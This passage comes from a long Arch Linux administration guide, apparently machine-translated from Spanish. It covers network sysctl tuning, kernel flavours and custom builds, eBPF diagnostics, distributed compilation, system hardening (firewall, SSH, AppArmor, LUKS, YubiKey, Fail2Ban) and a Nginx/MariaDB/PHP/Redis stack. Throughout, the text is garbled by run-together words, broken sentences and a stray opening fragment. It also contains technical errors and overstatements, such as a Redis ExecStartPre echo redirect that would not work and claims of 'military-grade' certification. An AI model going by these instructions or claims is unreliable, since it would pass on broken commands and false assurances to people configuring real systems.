(Using the planner is mandatory) fqstrict instead of fq_codelfor BBR to function at its full potential).

11.5.2 TCP Fast Open (Shortening the Handshake)

When you visit a secure website (HTTPS), your PC and the server perform a three-step "dance" (SYN, SYN-ACK, ACK) before sending you a single image. TCP Fast Open (TFO) allows your PC to store a cryptographic cookie after the first visit, so that on subsequent visits you send the web request directly to the SYN greeting, skipping the dance. Add the following to the same sysctl file:

net.ipv4.tcp_fastopen = 3

(The value 3 activates TFO for both outgoing and incoming connections, vital if you use local Nginx).

11.5.3 Explicit Congestion Notification (ECN)

Finally, we'll enable ECN. This allows intermediate routers (from your phone company) to mark packets with a "Caution, I'm overloaded" bit, instead of simply discarding them, which would force your Arch Linux system to resend them from scratch, causing lag in games.

net.ipv4.tcp_ecn = 1

After writing everything, it instructs the kernel to assimilate the changes on the fly without restarting:

sudo sysctl --system

Your network stack has evolved three decades in five lines of text. Your upload performance to remote servers (e.g., uploading files from Spain to Japan) will see an exponential increase in stability and sustained MB/s.

Chapter 12: Custom Kernels and Modular Architecture ↑ Home

In its strictest definition, "Linux" is not the operating system you're using (your full operating system is Arch, or more technically, a variant of GNU/Linux). Linux is exclusively the kernel: a megabyte of compiled code that holds absolute privileges (Ring 0) over the CPU and memory. It manages processes and translates commands from the mouse or hard drive into electrical impulses that the hardware can understand.

Linux Kernel Arch Linux uses a Modular Monolithic . This means it's a single huge block of code that loads at startup, but it has the magical ability to hot-swappable "modules" (network drivers, Bluetooth) while the PC is running. modprobe), without requiring restarts.

Understanding, managing, and even compiling your own kernels instead of accepting the default one marks the definitive transition to mastery in UNIX systems.

12.1 The Four Horsemen: Official Arch Kernels ↑ Home

The Arch Linux organization pre-compiles and officially distributes four flavors of the Linux kernel. Having multiple kernels installed on your hard drive simultaneously is not only possible, it's the official recommendation. If a critical software update introduces a kernel panic bug, you can simply select your backup kernel on the next boot (from GRUB) and instantly resume your work.

12.1.1 Linux (The Vanilla Rolling Release)

sudo pacman -S linux linux-headers

It's the default installed package. It directly follows Linus Torvalds' stable tree. It contains a conservative patch balance. It's your daily workhorse. (Technical note: The package -headersIt is mandatory. It contains the C code files and interfaces that programs like VirtualBox or NVIDIA's DKMS require to compile their own modules against your kernel version.

12.1.2 linux-lts (Long Term Support - El Salvavidas)

sudo pacman -S linux-lts linux-lts-headers

Linux development is progressing rapidly. A major version is released approximately every 10 weeks (e.g., from 6.8 to 6.9). If you use the kernel linuxYou'll be subject to those massive jumps. If an Intel network code update in 6.9 breaks your Wi-Fi card, your life will be miserable. Once a year, Torvalds and Greg Kroah-Hartman designate a version as LTS. This version (e.g., 6.6) is frozen and receives only security patches for 2 to 6 years. Installing the LTS kernel is mandatory as a backup. If you're using Arch as a server (VPS), this is the only kernel you should boot.

12.1.3 linux-zen (Real-Time Response and Latency)

sudo pacman -S linux-zen linux-zen-headers

Developed by the community (based on the historic Liquorix project), zenIt's heavily patched with one clear goal in mind: extreme interactivity on the desktop and in gaming. While a standard server kernel (LTS) is designed to process massive blocks of data (e.g., a database server) by giving a single process hundreds of milliseconds of uninterrupted processor time (High Throughput/Batching), the Zen kernel is hyperactive and eager. It uses low-latency schedulers that slice CPU time into tiny time slices. The result? If you push your CPU to 100% rendering a 4K video, and you move your mouse, the Zen kernel will interrupt rendering for half a microsecond to process your mouse movement and draw the graphical interface. Your PC feels silky smooth, even under crushing stress.

12.1.4 linux-hardened (For Security Paranoids)

sudo pacman -S linux-hardened linux-hardened-headers

This kernel includes a massive external security patch (from high-security Android projects like GrapheneOS). It closes hundreds of theoretical backdoors, prevents user-level RAM from accidentally accessing kernel spaces (strengthening KASLR), and restricts BPF functions to unprivileged users. The downside: System performance will be reduced by 3% to 10%, and programs like VirtualBox will often not work correctly. Ideal if you're going to give talks at hacker conventions like DEFCON or use untrusted public Wi-Fi networks.

12.2 Internal Management: Initramfs and Pacman Hooks ↑ Home

When you bought the package linux-zenAnd you installed 200 megabytes of data; some silent magic happened under the hood, for which you are entirely responsible. A kernel can't boot from a complex hard drive (like an NVMe drive formatted in Btrfs or encrypted with LUKS) because the kernel needs the "Btrfs" driver to read the drive... but the driver is on the drive itself. A vicious cycle.

The solution is Initramfs (Initial RAM File System). It's a compressed mini-operating system (about 15MB in size) that the boot manager (GRUB) loads into RAM along with the kernel. It contains disk decryption tools, LVM support, and basic bash commands. From there, the kernel boots up and transfers control to your main hard drive.

12.2.1 The Generator: mkinitcpio

Arch uses the program by default mkinitcpio(a pure bash script) to generate these initramfs files. (Fedora uses dracut(which is also supported in Arch).

When pacman installs a new kernel (e.g., an update of the linux-lts), you'll notice it throws a "Hook" (an automatic hook). This hook calls to mkinitcpiowhich analyzes your current hardware (detects if you use Ext4, USB keyboards, graphics cards) and immediately builds and compresses a file initramfs-linux-lts.imgPerfect for your machine, just drop it in /boot.

12.2.2 Adding Early KMS Modules

One of the essential optimizations for the modern user is achieving a clean visual transition (without black screen flashes) from the GRUB menu to your desktop, enabling high-resolution graphics from the very beginning. This is achieved by embedding your graphics card's large driver (which usually resides in /lib/modules/on your disk) directly in the initramfs in RAM.

Open the builder configuration file:

sudo nano /etc/mkinitcpio.conf

Find the matrix MODULES=()If you have integrated Intel graphics, add i915If you use AMD, add amdgpuIf you use NVIDIA, add nvidia nvidiamodeset nvidiauvm nvidia_drm.

MODULES=(amdgpu)

Since we've altered the way initramfs is built, we need to manually regenerate all the pre-compiled images of all our kernels. Run the following bulk command:

sudo mkinitcpio -P

12.3 The Master Level: Compiling a Custom Kernel (linux-tkg) ↑ Home

If you're a purist, you can download Linus Torvalds' C source code from kernel.org and use the dreaded commands make menuconfig(a blue text menu in the style of 1990s MS-DOS with over 10,000 cryptic kernel parameters) followed by a brutal make -j16.

However, compiling a kernel by hand and packaging it for pacman in a clean and uninstallable way requires writing PKGBUILDs of hundreds of lines. The contemporary "Arch" way of compiling ultra-optimized hand-built kernels (especially for gaming and low latency) is to use community orchestration tools, with Frogging-Family/linux-tkg being the most revered.

12.3.1 TKG Deployment

The project linux-tkgIt offers a wrapper script that downloads the kernel code, applies dozens of exclusive patches not found in the official Torvalds kernel (extreme and experimental optimizations that the official team considers too aggressive or unstable), and automates the compilation with makepkg.

1. Clone the repository from GitHub (never as root):

    git clone https://github.com/Frogging-Family/linux-tkg.git
    cd linux-tkg

1. Open the file customization.cfgAnd he reads the options with amazement. Here you can choose the processor scheduler algorithm (BORE, PDS, BMQ, CacULE). BORE, for example, is a scheduler that massively prioritizes video games over background system processes. You can also enable LTO cross-compilation and disable all kernel debugging hardware (debug symbols) to speed up boot time.
2. Run the Arch constructor (which will call the tkg script):

    makepkg -si

The Amazing Power of localmodconfigDuring the tkg interactive installer, the script will ask if you want to use localmodconfigIf you say yes, the compiler will look at the state of your hardware RIGHT NOW. It will see that you have a Logitech mouse, a Ducky keyboard, and Intel Wi-Fi. It will ignore the code for Razer mice, Xbox controllers, Chinese webcams from 1999, and IBM server satellite dishes. The massive 150MB vanilla kernel will be compiled into a concentrated, minuscule, and pure kernel of just 20MB that understands only the hardware universe in your own room, and nothing else. It will boot in fractions of a second and consume a pittance of RAM.

(Final warning: If you compile your kernel with localmodconfigAnd if tomorrow you buy a Wi-Fi card from another brand or a PS5 controller and plug it in via USB, your microscopic kernel won't know what they are, it won't have the modules, and the devices won't work. You'll have to recompile the kernel by connecting them before booting.

After compilation and updating your GRUB ( grub-mkconfig -o /boot/grub/grub.cfg), you will restart the machine and you will be running a system where even the lowest fibers of metal and silicone bend exactly to your needs.

12.4 Crossing the Border: eBPF (Extended Berkeley Packet Filter) ↑ Home

Imagine your Arch Linux kernel is crashing. A mysterious process is writing to the hard drive at 100 MB/s, and user tools like htopThey can't tell you who it is or what exact file it's writing because the process is born and dies in a millisecond (e.g., a corrupted cron job). Touching or debugging Ring 0 is terrifying: if the kernel stops, the PC goes into a kernel panic.

The modern technology that has revolutionized kernel analysis is called eBPF . It's an ultra-secure (and sandboxed) virtual machine embedded in the very heart of the Linux kernel. It allows system administrators to inject microprograms written in C that hook into internal kernel functions on the fly. If the injected program has a bug (an infinite loop or attempts to steal other people's memory), the eBPF virtual machine stops it before it executes, ensuring that the server never crashes.

12.4.1 Installation of eBPF Audit Tools

You don't need to be a kernel programmer to use eBPF. You can install the BCC tool collection and bpftrace, which come with dozens of pre-compiled scripts.

sudo pacman -S bcc-tools bpftrace

12.4.2 Practical Diagnosis of Syscalls

For example, if you suspect that mysterious process is consuming disk space, we'll use the script biosnoopBased on eBPF. It connects directly to the disk controller's I/O instructions:

sudo /usr/share/bcc/tools/biosnoop

When you press enter, the terminal will wait, ignoring user programs, printing every millisecond the PID, the application name, the physical disk sector, and the exact number of bytes being written.

Do you want to see if someone on the server is running the command? rm -rf(delete everything) secretly?

sudo /usr/share/bcc/tools/execsnoop

It will list in real time EVERY command (even hidden ones with a half-second lifespan) executed by any user. eBPF grants omnipresent power over the machine, godlike control over the code structure at the kernel level.

12.5 Industrial Compilation: ccache and distcc (Server Grade) ↑ Home

As we saw when generating hyper-optimized kernels (Chapter 12.3) with the flag -march=nativeCompiling millions of lines of C/C++ code (whether it's a custom kernel, the Chromium browser, or an entire base operating system) demands 100% of the processor's resources for hours. If you have a lightweight laptop and compile the kernel on it, it will likely shut down due to overheating.

To overcome the physical limitations of silicon, we use two fundamental business development tools.

12.5.1 The Compilation Cache (ccache)

If you compile the kernel today (version 6.10.1), and security update 6.10.2 is released tomorrow, 99.9% of the C files will remain unchanged. It would be foolish to... makepkgI would translate those files again. Ccache is a program that wraps GCC. When you compile a file, Ccache saves the result in a hidden secret database. ~/.ccache/If tomorrow you compile a file with the exact same content, ccache throws the command away, goes to its database, extracts the pre-calculated file, and injects it in milliseconds.

sudo pacman -S ccache

To force makepkgto use it, edit /etc/makepkg.conf: Search for the variable BUILDENV=()and remove the exclamation mark from ccache to enable it:

BUILDENV=(!distcc color ccache check !sign)

The first compilation of a TKG kernel will take 30 minutes. The second time (tomorrow's update) will take 45 seconds.

12.5.2 Distributed Network Compilation (distcc)

Imagine this scenario: You're in an office (or at home) with your (weak) quad-core laptop. But on the same local network, you have a massive (powerful) 16-core gaming desktop that's sitting idle, and maybe an old 8-core file server. Distcc lets you do build clustering.

When you write makepkgOn your laptop, your computer will delegate the files over the TCP network to the other computers. The giant desktop computer will compile 16 files at a time, the old server another 8, and they will send them back to you assembled. Your laptop will barely break a sweat, finishing colossal compilations in record time.

1. On slave machines (powerful PCs):

    sudo pacman -S distcc
    # Les decimos qué IPs de tu portátil tienen permiso para mandarles trabajo
    sudo nano /etc/conf.d/distccd
    # Añade: DISTCC_ARGS="--allow 192.168.1.0/24"
    sudo systemctl enable --now distccd.service

1. On the master machine (Your laptop):

    sudo pacman -S distcc

Tell your machine where its editing servants are. ~/.distcc/hosts:

    # IP del PC de escritorio (16 hilos) y el servidor viejo (8 hilos)
    192.168.1.50/16 192.168.1.60/8

1. Final integration in makepkg:

Edit again /etc/makepkg.confEnables distcc in it BUILDENVand alters the MAKEFLAGSto unleash the fury of all 24 combined cores throughout your home:

    BUILDENV=(distcc color ccache check !sign)
    MAKEFLAGS="-j25"

You have turned your home network into a unified Arch Linux supercomputing cluster.

Chapter 13: Cryptography and Advanced System Security ↑ Home

Linux is inherently secure from its inception due to its UNIX multi-client file design (everything requires the blessed sudoHowever, Arch Linux adheres to its doctrine of doing nothing by default. Your newly installed system is an open canvas of ports. If you connect your laptop to an airport Wi-Fi network, other infected machines can call your ports (Nmap scans). If you leave your physical PC in a coffee shop, anyone with a USB drive can boot into a chroot environment and extract your browser passwords.

This chapter elevates the technical and cryptographic security of the system from "careless consumer" to "impregnable architecture".

13.1 The Kernel Firewall (Netfilter and UFW) ↑ Home

The magic that blocks malicious network requests lives deep within the Kernel, in a subsystem historically called netfilter(and in its evolutions) iptablesand the modern nftables). Write the mathematical cryptographic rules for nftablesDoing it manually is a recipe for sanity and productivity suicide. We use front-end software. The two industry giants are firewalld(complex, the standard at Red Hat) and UFW(Uncomplicated Firewall, a clean design created by Canonical for Ubuntu, perfect for personal computers).

Firewall Manager Installation:

sudo pacman -S ufw

13.1.1 Configuring Defense Policies (Drop and Deny)

A computer's standard paranoid policy (Default Policy) is simple: "I can call outside and nobody can call me from outside."

# Rechazar silenciosamente todas las conexiones que intentan entrar a mi PC
sudo ufw default deny incoming

# Permitir que los navegadores y juegos en mi PC llamen al exterior (Internet)
sudo ufw default allow outgoing

Opening Ports Out of Necessity (Whitelisting): If you are a web developer (Node.js/React/Apache), you may want to see how the website temporarily hosted on your local PC looks on your mobile device (port 80 for HTTP or 3000 for Node).

sudo ufw allow 80/tcp
sudo ufw allow 3000/tcp

For a detailed visual breakdown of how the rules are currently configured:

sudo ufw status verbose

And finally, instruct the system to put up a permanent shield (persistent between reboots):

sudo ufw enable
sudo systemctl enable --now ufw.service

13.2 Securing the SSH Daemon (Secure Shell) ↑ Home

If you rent a VPS (Virtual Private Server) with Arch Linux in the cloud (e.g., DigitalOcean, AWS), you are entirely dependent on sshdto control it remotely from your PC. The OpenSSH daemon's factory configuration is criminally naive and weak for the modern internet, because it accepts "Password Authentication".

Any PC open to the internet with port 22 receives approximately 5,000 to 10,000 daily brute-force attacks from global bot farms testing infinite dictionaries ( root, admin123, password) automatically until it finds yours.

13.2.1 The Asymmetric Cryptographic Key Ecosystem

The only way to be 100% invulnerable to brute force is to disable traditional passwords and use elliptic curve cryptography. You create a pair of randomly generated mathematical keys, keep the private key on a USB drive at home (it never leaves your physical PC), and copy the public key to the server. The SSH server will send a monstrous mathematical puzzle, and only your PC (using the private key) can solve it. There's no text, no guessing game.

1. Key Generation on your Client PC: Use the Ed25519 format (modern ultra-secure and fast algorithm, never use the outdated RSA):

ssh-keygen -t ed25519 -C "llave_servidor_arch"

(Save in ~/.ssh/id_ed25519Add a passphrase to encrypt the key file itself in case your client computer is hacked.

2. Copy to Remote Machine:

ssh-copy-id -i ~/.ssh/id_ed25519.pub tu_usuario@192.168.1.100

(You will need to enter the password by text the last time; this installs the key on the remote server) ~/.ssh/authorized_keys).

13.2.2 Hardening the Server Configuration

On your remote server or Arch machine, access and drastically modify the SSH master rules:

sudo nano /etc/ssh/sshd_config

Search and modify (by uncommenting) as required:

• PasswordAuthentication noThe bot attack has just been 100% neutralized. No one can type in any text keys.
• PermitRootLogin noIf an attacker logs in using the stolen key, they will access a normal user account. You prohibit direct remote login from the root account.
• Port 2244(Optional): If you change the standard port 22 to a dark port, 90% of the massive bot scanners (nmap-zmap bots) from Russia/China won't even find your gateway. (Don't forget that your UFW Firewall must be modified to support the new port.)

Reset the system lock: sudo systemctl restart sshd.service.

13.3 Functional Kernel Isolation with AppArmor ↑ Home

Let's say you have the best firewall in the world (UFW), but one day you visit a website and your Firefox browser silently downloads a malicious script (Zero-Day Exploit). The script is executed locally, with your permissions, and since Firefox has the right to read the photos in your folder Mis Imágenesor the SSH keys ( ~/.sshThe virus will package it and steal everything. Network UFW cannot protect you from yourself; you need local software sandboxing.

In the Linux ecosystem there is SELinux (Absolute complexity, used in Red Hat) and AppArmor (used by Ubuntu and SuSE, very intuitive).

AppArmor adds Mandatory Access Control (MAC) at Ring Zero (the kernel's Ring 0). It assigns strict "profiles" to software applications, forcing them to adhere to the Principle of Least Privilege. A Firefox profile would say: "Firefox is ONLY allowed, by order of the machine's military kernel, to access the ~/Downloads folder. It is denied hardware read access to ~/.ssh or ~/.gnupg." The attack has been neutralized at its underlying level.

13.3.1 Activation at Startup (Grub Parameters)

Install AppArmor and the gigantic set of profiles created by the Ubuntu and Debian Foundation community:

sudo pacman -S apparmor

AppArmor is not a program that starts automatically. It is a Linux Security Module (LSM) that must be injected into the kernel at millisecond one. It opens the GRUB boot manager:

sudo nano /etc/default/grub

Online GRUBCMDLINELINUX_DEFAULT, add these bulk parameters to the end of the line:

lsm=landlock,lockdown,yama,integrity,apparmor,bpf

(We are activating a full battery of Kernel security modules: yama, integrity... AppArmor is one of them).

Update the motherboard's UEFI table: sudo grub-mkconfig -o /boot/grub/grub.cfg.

13.3.2 Activation of Demons and Auditing

When you restart your PC, the kernel will be listening for the profiling application. It starts the userspace loader daemon, which injects the files into the kernel on every boot.

sudo systemctl enable --now apparmor.service

You can monitor the underlying magic using a diagnostic utility like aa-statusYou'll see hundreds of profiles (e.g. libreoffice, evince, tcpdump) are marked as [enforce]Mode. You are protected. Any system violation will generate a severe red warning in your master log. dmesg.

13.4 Cryptography at Rest: The LUKS Mandate ↑ Home

The firewall repels cyber intrusions; AppArmor neutralizes internal exploits. But if you close your laptop in a coffee shop, get up to grab some napkins, and someone snatches it away, you've lost the battle. Linux (and Windows Local) passwords logically reside in a file ( /etc/shadowAn attacker will remove the SSD from your laptop with a screwdriver, connect it to their computer, mount the file ignoring your operating system, and read every photo, document, and email session as a simple text file (Cleartext).

The ultimate defense of computing is Full Disk Cryptography (FDE) . In Linux, the subsystem is called dm-crypt and the container format is called LUKS (Linux Unified Key Setup).

The encryption takes the millions of structured bits (zeros and ones) of your Ext4, Btrfs, or partition /homeAnd, by passing through a brutal mathematical block of your processor's core (a hardware-driven 256-bit or 512-bit AES-XTS), it converts your photos and the entire operating system into radioactive random white noise (high entropy). If your hard drive is removed, forensic scientists, a thief, or an intelligence agency will find thousands of gigabytes of useless static. The only way to revert the noise back to pure data is by using the Master Unlock Password (Passphrase) written to the GRUB bootloader before booting.

13.4.1 The Pragmatic Reality of Implementing LUKS

Unlike a Firewall or AppArmor that you can install on any given Tuesday, LUKS acts directly as a destructive layer below the disk formatting .

Installing LUKS on an Ext4 disk that has been in use for a year is unrealistic. It would require compressing all your data, decrypting it in place with extremely slow tools, and if the power goes out for even 1 millisecond during the 8-hour process, you'll lose the entire disk forever. The deep technical implementation of LUKS demands architectural planning during the installation process (Chapter 2 of this manual). After using cfdisk, is invoked cryptsetup luksFormat /dev/nvme0n1p3, the mathematical container is temporarily unlocked ( cryptsetup open), and within the unlocked container with only then is the Ext4 format applied mkfs.ext4 /dev/mapper/root_encriptado.

If you're reading this on a laptop full of corporate secrets and you don't have LUKS, the official high-security recommendation is: back up your folder ~/.configand critical documents on a USB drive, perform a clean installation from scratch (The Arch Way with Cryptography), and live in an ecosystem where a stolen drive is just a harmless piece of plastic and aluminum.

13.4.2 Final Audit (Lynis)

The system is now impenetrable at the network, process, and physical disk levels. To confirm this superhuman effort by the SysAdmin, download the Lynis moral hacking suite.

sudo pacman -S lynis
sudo lynis audit system

The script will scan all your daemons and files and print a Hardening Index report with recommendations (e.g., disable compilers for unprivileged users). Your Arch Linux now operates under military-grade certification standards (DoD).

13.5 Security Hardware: FIDO2 Authentication (YubiKey) ↑ Home

Even with LUKS passwords, Ed25519 SSH keys, or kernel encryption, the weak link will always be the keyboard. If your computer is on, your hard drive is decrypted, and someone installs keylogger software, it will capture the root password every time you run `/etc/keylogger`. sudo pacman -Syu.

In a "Zero Trust" ecosystem (the standard in corporations like Google), no key typed on a keyboard is considered secure. Maximum security requires the U2F/FIDO2 (Universal 2nd Factor) protocol. This is implemented by purchasing USB cryptographic hardware (such as a YubiKey).

This USB chip stores a private key that is impossible to physically extract (its circuit self-destructs if you try to open it).

13.5.1 Integrating YubiKey with Sudo (PAM)

In Arch Linux, we can rewrite the system-wide authentication modules (PAMs - Pluggable Authentication Modules). We'll tell the system: "When you try to do a sudo"Ask me for my password, but IF I DON'T PHYSICALLY TOUCH the gold sensor of the USB inserted in the machine, deny me access ." A hacker from Russia controlling your PC remotely won't be able to touch the physical USB in your living room; their destructive commands will fail.

1. Install the dependencies and the official Yubico PAM module:

    sudo pacman -S yubico-pam libfido2

1. Map your key to the current user:

Insert your YubiKey. Generate an association file in your home directory:

    mkdir -p ~/.yubico
    # Este comando genera un desafío FIDO que la llave resolverá (tócala cuando parpadee)
    pamu2fcfg > ~/.yubico/u2f_keys

1. Forcing Sudo's Behavior:

This is a critical step. If you do it wrong, you could lock yourself out of root access. Open (with extreme caution) the sudo PAM control file:

    sudo nano /etc/pam.d/sudo

Just below the line that says #%PAM-1.0, add the following instruction:

    auth required pam_u2f.so

Open a new terminal without closing the current one. Type sudo lsIt won't ask for a password; the console will freeze. Your YubiKey will be flashing furiously green. The instant your finger makes human contact with the key's capacitive metal, the command lsIt will run. If the USB is not inserted, access is mathematically denied.

13.6 Active Defenses: Intrusion Detection System (IDS) and Expanded Fail2Ban ↑ Home

A system exposed to the internet is like a castle under constant siege. Passive firewalls (UFW Firewall, Chapter 13.1) block closed ports. But what about legitimate ports? If you host a Nextcloud server, Jellyfin, or even a simple web application on an open port, an attacker will try to exploit the application's login screen.

13.6.1 Brutal Expansion of Fail2Ban

Fail2Ban is a Python daemon that monitors log files (journals). When it detects too many consecutive errors from the same IP address, it dynamically injects a rule into the firewall (UFW) to "ban" that attacker for X hours.

sudo pacman -S fail2ban
sudo systemctl enable --now fail2ban.service

By default, Fail2Ban only protects the SSH port. But we can teach it to protect any service using Regular Regressions (Regex) in files. .local.

Customized Protection (The Nextcloud Case): Imagine a server in the cloud ( /var/log/nextcloud/nextcloud.log). You create the logical filter (the key mask):

sudo nano /etc/fail2ban/filter.d/nextcloud.conf

You add:

[Definition]
failregex = ^.*Login failed: .* \(Remote IP: '<HOST>'\).*$
ignoreregex =

Then, you activate "the jail" by adding it to the local jails file:

sudo nano /etc/fail2ban/jail.local

[nextcloud]
enabled = true
port = http,https
filter = nextcloud
logpath = /var/log/nextcloud/nextcloud.log
maxretry = 3
bantime = 86400 # Si te equivocas 3 veces, bloqueado 24 horas (86400 segundos).

Restart the daemon ( sudo systemctl restart fail2banNow you have a security guardian that continuously patrols the logs, choking entire botnets from the Kernel's network layer.

13.6.2 Post-Breach Audit: Rootkit Search

Despite AppArmor and LUKS, we must remain humble in the face of state-sponsored actors or zero-day CPU vulnerabilities (such as Spectre or Meltdown). If a breach has occurred, the attacker will install a "rootkit": a set of code that modifies standard tools ( ls, ps) of your own operating system to make itself invisible. If a rootkit is installed, when you do htopto see the processes, the one htopIt has been maliciously reprogrammed to not display the virus.

The cure is external and independent auditors: rkhunter (Rootkit Hunter) and chkrootkit .

sudo pacman -S rkhunter chkrootkit

As a mental health precaution for an Arch Linux server, you can schedule a systemd timer (Chapter 10) to run these tools during the early morning hours. sudo rkhunter --check

The tool will download a database of cryptographic signatures. It will analyze whether the binaries in your /usr/bin/They match the ones that pacman originally installed, or if they have been overwritten by an attacker.

With this arsenal of U2F physical keys, reactive network cages, and immutable binary auditors, you have turned your Arch Linux server into a paranoid, high-availability fortress, capable of sustaining its sovereignty in the hostile core of the Internet.

Chapter 14: Web Server Architecture (Complete LEMP Stack) ↑ Home

Since Arch Linux always has the latest binary packages (e.g., the latest PHP 8.x and Nginx 1.25+ builds), setting up a web server environment on it results in one of the fastest platforms available. Many administrators avoid Arch in production due to concerns about the rolling release model, but if you bypass the graphical environment packages and manage your server headless (console-only), its stability and agility are formidable for a knowledgeable sysadmin.

architecture We are going to deploy a LEMP (Linux, Nginx, MariaDB, PHP), the standard that replaces the old LAMP (which Apache used).

14.1 Nginx: The Reverse Proxy and Asynchronous Web Server ↑ Home

While Apache (the standard during the 2000s) created a new RAM-consuming process/thread for each user who visited your website (limiting the number of visits your PC could handle), Nginx (pronounced Engine-X) was designed by the Russian Igor Sysoev with an asynchronous (event-driven) architecture. A single Nginx process can handle more than 10,000 simultaneous connections using almost no extra RAM, and it works exceptionally well as a reverse proxy (when placed in front of a Node.js or Python server).

14.1.1 Installation and Initial Optimization

sudo pacman -S nginx

Before even starting the service, we'll adjust the main engine. Open the Nginx configuration:

sudo nano /etc/nginx/nginx.conf

In the first lines, the behavior of the "Workers" changes. worker_processes 1; by:

worker_processes  auto;
worker_rlimit_nofile 100000;

(This tells Nginx to deploy as many workers as you have available CPU cores, and raises the limit of files that the Linux kernel allows you to keep open simultaneously.)

In the section events:

events {
    worker_connections  4096;
    multi_accept on;
}

(Multi-accept allows the worker to accept all new connections at once, massively reducing latency when your server experiences a spike in traffic - "Slashdot effect").

Enable and start the beast:

sudo systemctl enable --now nginx.service

(Firewall Note: If you followed Chapter 13 of UFW, you should run sudo ufw allow 80/tcp and sudo ufw allow 443/tcp).

14.2 Relational Engines (MariaDB) and Storage ↑ Home

The relational database engine is the heart of your application's state (where users, passwords, and items are stored). Oracle bought MySQL and partially shut it down; the original creator forked his own code and called it MariaDB, guaranteeing that it would always be open source. In Arch, they are 100% interchangeable command for command.

14.2.1 Cluster Initialization in Arch

A critical technical detail: installing the MariaDB package on Arch Linux does NOT create the file system scaffolding where the InnoDB tables or the system's B-trees reside. This is intentional for security reasons (on Ubuntu, this is done hidden in a deb-post-install script).

1. Install the motor:

   sudo pacman -S mariadb

1. Initialize the data cluster with the user mysql:

   sudo mariadb-install-db --user=mysql --basedir=/usr --datadir=/var/lib/mysql

1. The demon starts:

   sudo systemctl enable --now mariadb.service

14.2.2 Database Hardening

A newly installed database server is a ticking time bomb (any anonymous user can log in). MariaDB includes a script to patch these vulnerabilities. Run:

sudo mariadb-secure-installation

• Root Password (MariaDB): It will ask if you want to configure authentication with unix_socketIn Arch, it is highly recommended, as it prevents someone from trying to log in as rootto the database unless it is the user rootphysical components of your computer in Linux.
• Say "Y" (Yes) to delete anonymous users.
• Tell "Y" to disable remote access for the Root user.
• Tell "Y" to delete the testing database.
• Tell "Y" to reload table privileges.

14.3 The Server Process Manager: PHP-FPM ↑ Home

Nginx, due to its hyper-efficient design, does not include a code processor (it doesn't understand PHP, Python, or Ruby). It is purely an HTTP server and dispatcher for static files (images, CSS). To run a dynamic website (like WordPress), we need to install a processor that runs in parallel. For PHP, the standard is FastCGI Process Manager (PHP-FPM).

14.3.1 UNIX Installation and Sockets

sudo pacman -S php php-fpm

PHP-FPM and Nginx need to communicate with each other extremely fast (thousands of times per second). They could communicate by sending internal network packets (TCP to port 127.0.0.1:9000), but on the same physical machine, this consumes resources from the kernel's TCP/IP stack. The professional solution is to use a UNIX socket , a physical file (usually /run/php-fpm/php-fpm.sock) which acts as a direct memory tunnel.

We enabled the PHP-FPM service:

sudo systemctl enable --now php-fpm.service

14.3.2 Routing Nginx to PHP

Open the Nginx "Server Block" (Virtual Host) configuration in /etc/nginx/nginx.confFind the block that begins with server { listen 80; ... }.

Modify it to catch all requests ending in .phpand pass them to the php-fpm UNIX socket:

server {
    listen       80;
    server_name  mi-sitio-web.com www.mi-sitio-web.com;
    root   /usr/share/nginx/html;
    index  index.php index.html;

    location / {
        # Si el archivo no existe físicamente, mándaselo al enrutador (index.php)
        try_files $uri $uri/ /index.php?$args;
    }

    # Bloque FastCGI
    location ~ \.php$ {
        # Intercepta archivos php
        fastcgi_pass   unix:/run/php-fpm/php-fpm.sock;
        fastcgi_index  index.php;
        include        fastcgi.conf;
    }

    # Bloque de seguridad extra
    location ~ /\.ht {
        deny  all;
    }
}

Create a test file in /usr/share/nginx/html/info.phpthat contains <?php phpinfo(); ?>, recarga nginx ( sudo systemctl restart nginx.service) and visit your IP in the browser.

14.4 SSL/TLS Cryptography: EFF Certbot ↑ Home

Hosting a website on HTTP (port 80) in the 21st century is unacceptable; all data (including your WordPress users' passwords) travels in plain text across the network of undersea cables, and modern web browsers (Chrome/Firefox) will penalize your SEO or outright block access to your site by displaying a red security alert screen ("Your connection is not private"). Previously, SSL/TLS certificates (for the green address bar with the padlock) cost hundreds of dollars a year. Today, the Electronic Frontier Foundation (EFF) manages Let's Encrypt, which offers free, encrypted, powerful, and automated certificates.

14.4.1 Certbot's Total Automation

For this to work, your Arch server must have a real domain (e.g. www.tu-web.com) pointing to your public IP from your domain registrar (Cloudflare, Namecheap), and ports 80 and 443 open on your home/VPS router.

We installed the EFF command-line tool (Certbot) and its special module to communicate with Nginx:

sudo pacman -S certbot certbot-nginx

The deployment is brutally simple:

sudo certbot --nginx

The Certbot script will do the following:

1. It will read your file /etc/nginx/nginx.confsearching for the blocks server_name.
2. You will set up a mini web server to solve an HTTP-01 cryptographic challenge using Let's Encrypt servers to prove that you own the physical machine.
3. Your certificate will be downloaded .pemand the private key .key.
4. Magic: Certbot will automatically modify (write code) your file nginx.conf, closing the block on port 80, forcing a 301 redirect to port 443 (HTTPS), and injecting the paths of your SSL certificates.
5. It will reload Nginx gracefully without interrupting visits.

14.4.2 Automated Renewal (Systemd Timer)

Let's Encrypt certificates expire in exactly 90 days to mitigate damage in case of cryptographic theft. To avoid SSH logins every three months, the Arch package already includes a timer. certbot.timer) which checks the certificates twice a day and renews them if there are less than 30 days left until their expiration.

sudo systemctl enable --now certbot.timer

You've built a complete, enterprise-grade stack that's secure, hyperfast, asynchronous, and fully self-renewing. Your infrastructure is ready to host anything you can imagine.

14.5 RAM Cache Storage (Redis) ↑ Home

If you have a WordPress blog receiving 1,000 visits per hour, your MariaDB database will have to read articles from the hard drive (SSD) and recalculate SQL queries 1,000 times. This will overload your CPU. The industry solution for high-traffic websites isn't to improve MariaDB, but to place a hyper-fast key-value store (KVS) in RAM right in front of it. The undisputed king of this is Redis .

Redis stores the most frequently requested data in RAM. RAM is 100 times faster than an NVMe SSD. If the page exists in Redis, it is served to the user in microseconds, bypassing MariaDB entirely.

14.5.1 Installation and Optimization of the Kernel for Redis

sudo pacman -S redis

Redis is extremely demanding regarding how the Linux kernel manages memory. If you boot Redis without modifying your kernel, it will throw warnings in its logs indicating that its performance is paralyzed.

We need to solve two problems in sysctl ( /etc/sysctl.d/99-redis.conf):

# Redis necesita permiso para sobredemandar memoria (Overcommit)
vm.overcommit_memory = 1
# Redis necesita que desactivemos THP (Transparent HugePages) dinámico para evitar latencias de purga

To disable THP (If you enabled THP in Chapter 11, you must create an exception for the Redis service in systemd) ExecStartPre=/usr/bin/echo never > /sys/kernel/mm/transparent_hugepage/enabled).

Enable and start Redis:

sudo systemctl enable --now redis.service

